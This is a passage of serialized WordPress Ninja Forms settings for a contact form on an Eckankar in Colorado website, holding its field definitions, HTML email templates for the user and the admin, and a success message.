dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_52\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_52\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:174;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_53\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_53\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:175;}i:10;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800453785\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"628\";}i:11;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_55\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_55\";}s:2:\"id\";i:177;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:02\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:61;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:02\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_47}\";s:13:\"email_subject\";s:34:\"Loveland Leadership Communications\";s:13:\"email_message\";s:3552:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_45},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:62;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:02\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:63;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:02\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:34:\"Loveland Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3856:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Loveland Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_45}Â {field:lastname_46}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:64;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:34:\"Loveland Leadership Communications\";s:10:\"created_at\";s:19:\"2019-07-15 14:06:21\";s:10:\"form_title\";s:34:\"Loveland Leadership Communications\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 18:19:57\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"2\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:12:{i:0;s:7:\"html_44\";i:1;s:10:\"textbox_45\";i:2;s:11:\"lastname_46\";i:3;s:8:\"email_47\";i:4;s:8:\"phone_48\";i:5;s:13:\"listselect_49\";i:6;s:5:\"hr_50\";i:7;s:7:\"html_51\";i:8;s:13:\"listselect_52\";i:9;s:11:\"textarea_53\";i:10;s:18:\"html_1663800453785\";i:11;s:9:\"submit_55\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a: